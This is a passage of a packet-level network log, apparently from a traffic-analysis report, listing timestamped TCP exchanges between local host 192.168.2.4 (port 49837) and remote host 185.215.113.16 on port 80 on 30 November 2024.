                                                      Nov 30, 2024 18:08:43.055249929 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.055422068 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.055466890 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.056217909 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.056287050 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.056394100 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.056435108 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.057204962 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.057409048 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.057456970 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.058336973 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.058386087 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.058721066 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.058906078 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.059340000 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.059389114 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.059520006 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.059560061 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.060398102 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.060435057 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.060606956 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.061439037 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.061496019 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.061625957 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.061674118 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.062686920 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.062923908 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.062973022 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.063601017 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.063657045 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.063990116 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.064042091 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.064740896 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.064790964 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.064877987 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.064919949 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.065635920 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.065704107 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.065882921 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.066694975 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.066745996 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.066884041 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.066930056 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.067749977 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.067800045 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.068049908 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.068099976 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.068804026 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.068854094 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.069058895 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.069103956 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.069879055 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.069960117 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.070080042 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.070123911 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.070950985 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.071079016 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.071120024 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.071202040 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.071997881 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.072133064 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.072232962 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.072274923 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.073029041 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.073071957 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.073188066 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.073235989 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.219784021 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.219955921 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.220022917 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.220436096 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.220459938 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.220488071 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.220518112 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.220859051 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.221028090 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.221071005 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.221301079 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.221348047 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.222135067 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.222184896 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.222276926 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.223160028 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.223203897 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.223295927 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.223342896 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.224266052 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.224312067 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.224440098 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.224486113 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.225238085 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.225284100 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.225521088 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.225773096 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.226301908 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.226347923 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.226545095 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.226589918 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.227349997 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.227396011 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.227628946 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.227674007 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.228427887 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.228473902 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.228650093 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.228696108 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.229507923 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.229554892 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.229758024 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.229820013 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.230500937 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.230545044 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.230700970 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.230746031 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.231559038 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.231600046 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.231756926 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.231803894 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.232606888 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.232652903 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.232811928 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.232858896 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.233658075 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.233704090 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.233890057 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.234741926 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.234791994 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.234916925 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.234956026 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.235750914 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.235795975 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.236005068 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.236052036 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.236835003 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.236879110 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.237085104 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.237132072 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.238332987 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.238344908 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.238387108 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.238945961 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.238990068 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.239222050 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.239268064 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.239993095 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.240057945 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.240261078 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.240309000 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.241067886 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.241112947 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.241259098 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.241305113 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.242162943 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.242396116 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.242440939 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.243248940 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.243304968 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.243453979 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.243501902 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.244213104 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.244257927 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.244446039 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.244488955 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.245253086 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.245297909 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.245492935 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.245536089 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.246340990 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.246536970 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.246587038 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.247351885 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.247400045 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.247597933 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.247646093 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.248451948 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.248495102 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.248636961 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.248682022 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.249490976 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.249536037 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.249664068 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.250577927 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.250631094 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.250808954 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.250857115 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.251583099 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.251631975 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.251769066 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.251813889 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.252655029 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.252716064 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.252847910 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.252895117 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.253690958 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.253936052 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.253976107 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.254784107 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.254829884 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.255141020 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.255187035 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.255810976 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.255857944 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.255987883 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.256031036 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.256855965 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.257030964 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.257064104 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.257101059 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.257950068 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.257986069 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.258122921 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.258163929 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.258970976 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.259013891 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.259280920 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.259341002 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.260209084 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.260272980 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.260338068 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.260385036 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.261089087 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.261136055 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.261308908 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.261351109 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.262176037 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.262352943 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.262404919 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.263248920 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.263295889 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.263391018 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.263447046 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.264254093 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.264300108 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.264451027 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.264497042 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.265276909 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.265321016 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.265516043 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.265561104 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.266366959 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.266571999 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.266618967 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.267424107 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.267471075 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.267638922 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.267685890 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.268452883 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.268498898 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.268687963 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.268734932 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.269510984 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.269556046 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.269722939 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.269771099 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.270571947 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.270793915 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.270838022 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.272449970 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.272495031 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.273435116 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.273479939 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.273509979 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.273551941 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.273852110 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.275388002 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.275398016 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.275438070 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.275470972 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.276113987 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.277627945 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.421236992 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.421442986 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.421519041 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.421789885 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.421838045 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.422148943 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.422195911 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.422791004 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.422837019 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.422971964 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.423019886 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.423847914 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.423892021 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.424017906 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.424063921 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.424886942 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.424932957 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.425096989 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.425142050 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.425961971 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.426175117 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.426223040 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.426976919 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.427022934 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.427194118 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.427241087 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.428066015 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.428131104 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.428275108 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.428323030 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.429095984 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.429142952 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.429307938 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.429352999 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.430160046 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.430356026 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.430408955 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.431200027 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.431247950 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.431406975 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.431467056 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.432327032 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.432373047 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.432537079 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.432581902 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.433367014 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.433410883 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.433561087 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.433605909 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.434393883 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.434580088 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.434627056 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.435513020 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.435556889 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.435784101 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.435836077 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.436533928 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.436578035 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.436690092 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.436736107 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.437542915 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.437587976 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.437716961 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.437763929 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.438600063 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.438844919 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.438895941 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.439660072 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:43.439704895 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:43.439845085 CET8049837185.215.113.16192.168.2.4
